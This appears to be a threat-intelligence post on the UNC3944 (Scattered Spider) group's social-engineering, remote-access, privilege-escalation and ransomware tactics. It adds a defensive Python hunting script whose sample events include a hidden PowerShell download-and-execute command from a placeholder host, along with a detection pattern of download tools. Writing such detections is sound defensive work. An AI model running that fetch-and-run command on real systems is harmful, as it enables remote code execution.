UNC3944 is a group that uses social engineering and smishing (SMS phishing) to obtain credentials from its victims through fake sites and infiltration of the target organisation. The group uses the acquired data to gain initial access to systems and then escalate privileges. They are also known as 0ktapus, Scatter Swine or Scattered Spider. In mid-2023, UNC3944 started deploying ransomware in victims' environments, most likely to increase the group's earnings through extortion.
The most notable tactics, techniques, and procedures observed during UNC3944's operations were:
- Using social engineering to gain access to the victim's systems, e.g., smishing campaigns or calls to the helpdesk to force password resets or obtain multi-factor authentication codes.
- Using publicly accessible networks (e.g., in restaurants or coffee shops) in the same local area as the target of the attack; this is how the attackers tried to hide their presence and deceive security monitoring systems.
- Using legitimate software, including remote access programs that can be downloaded from vendors' websites, such as AnyDesk.
- Operating at an extreme pace, gaining access to critical systems and acquiring large amounts of data in a matter of days; such a pace can catch victims' security teams off guard.
- Thorough analysis of the victim's resources (e.g. internal documentation, internal call logs) to find information that can help escalate privileged access and maintain a presence in the environment.
- Privilege escalation, most often achieved through attacks on password managers or privileged access management (PAM) systems.
- Creating unmanaged virtual machines in the victim's environment, from which attacks are launched.
- When deploying ransomware, the attackers mainly target virtual machines and other systems that are critical to the organisation, in an attempt to maximise the negative impact on the victim.
- Aggressive communication with victims: leaving threatening notes in systems, contacting managers by text and e-mail, and infiltrating the communication channels used for incident handling in order to tailor subsequent threats to the victim's actions.
Figure 1. UNC3944 group attack life cycle, source: Mandiant.com
Phishing tools linked to UNC3944’s activity
Mandiant has identified three tools that UNC3944 has been using to make its phishing campaigns more convenient.
- The first tool, named EIGHTBAIT, uses a Telegram channel to send intercepted login data to the attacker. It can also deploy AnyDesk on the victim's system to gain remote control of it, so the kit was designed with desktop systems in mind. It was used between the end of 2021 and mid-2022.
- The second tool is a new phishing kit whose use was observed in the third quarter of 2023. It uses a copy of the target organisation's authentication page to steal the victim's data. The tool has been used in recent intrusions.
- In mid-2023, a third tool was identified. It was used at the same time as the second one and was inspired by it, with only minor changes in the code.
UNC3944 also uses publicly available tools to steal credentials and puts considerable effort into searching internal systems for ways to obtain privileged access credentials. For example, the group uses PowerShell scripts to download the ULTRAKNOT or Meduza stealer to victim systems.
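The two host-level behaviours described on this page that leave telemetry on the endpoint, PowerShell pulling a payload from the network and a legitimate remote-access tool such as AnyDesk appearing on a workstation, can be hunted for together. The script below is an added example for defenders, not code from Mandiant or the report; the event lines, the `example.invalid` URL, the cradle pattern list and the `svc_rmm` allow-list are all constructed for illustration.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed endpoint telemetry (not real data): one JSON process event per line.
# The URL host "example.invalid" is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = """\
{"ts":"2023-09-01T10:00:00","host":"ws01","user":"j.doe","image":"powershell.exe","cmdline":"powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1'))"}
{"ts":"2023-09-01T10:04:00","host":"ws01","user":"j.doe","image":"AnyDesk.exe","cmdline":"AnyDesk.exe --install C:\\\\ProgramData\\\\AnyDesk --silent"}
{"ts":"2023-09-01T15:30:00","host":"ws02","user":"svc_rmm","image":"AnyDesk.exe","cmdline":"AnyDesk.exe --install C:\\\\ProgramData\\\\AnyDesk"}
{"ts":"2023-09-02T09:00:00","host":"ws03","user":"a.kim","image":"powershell.exe","cmdline":"powershell -c Get-Date"}
"""

# Rule 1 (report: PowerShell used to pull ULTRAKNOT/Meduza onto hosts): a download
# cradle in a PowerShell command line. The pattern list is this example's own.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod"
                    r"|\biwr\b|\bcurl\b|\bwget\b|Start-BitsTransfer", re.I)
# Rule 2 (report: legitimate remote-access software such as AnyDesk): the tool runs
# under an account that is not on the organisation's approved-RMM list (assumed here).
REMOTE_TOOLS = {"anydesk.exe"}
APPROVED_RMM_USERS = {"svc_rmm"}   # hypothetical allow-list


def classify(event: dict) -> set:
    """Return the report-listed behaviours a single event exhibits (empty if none)."""
    tags = set()
    image = event.get("image", "").lower()
    if image in ("powershell.exe", "pwsh.exe") and CRADLE.search(event.get("cmdline", "")):
        tags.add("powershell_download_cradle")
    if image in REMOTE_TOOLS and event.get("user") not in APPROVED_RMM_USERS:
        tags.add("unapproved_remote_access_tool")
    return tags


def correlate(raw: str, window: timedelta = timedelta(hours=1)) -> dict:
    """Per host, collect tagged events and alert when two or more distinct behaviours
    fall within `window` of each other, matching the fast chained tempo the report describes."""
    per_host = defaultdict(list)
    for line in filter(str.strip, raw.splitlines()):
        ev = json.loads(line)
        for tag in classify(ev):
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), tag))
    alerts = defaultdict(set)
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            tags = {tag for t, tag in hits[i:] if t - t0 <= window}
            if len(tags) >= 2:
                alerts[host] |= tags
    return {h: sorted(t) for h, t in alerts.items()}
```

Running `correlate(SAMPLE_EVENTS)` flags only `ws01`, where both behaviours occur four minutes apart; `ws02` is suppressed by the allow-list and `ws03` shows no download cradle.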
To discover more about the activities of the UNC3944 group, read the insightful source texts:
Financially Motivated UNC3944 Threat Actor Shifts Focus to Ransomware Attacks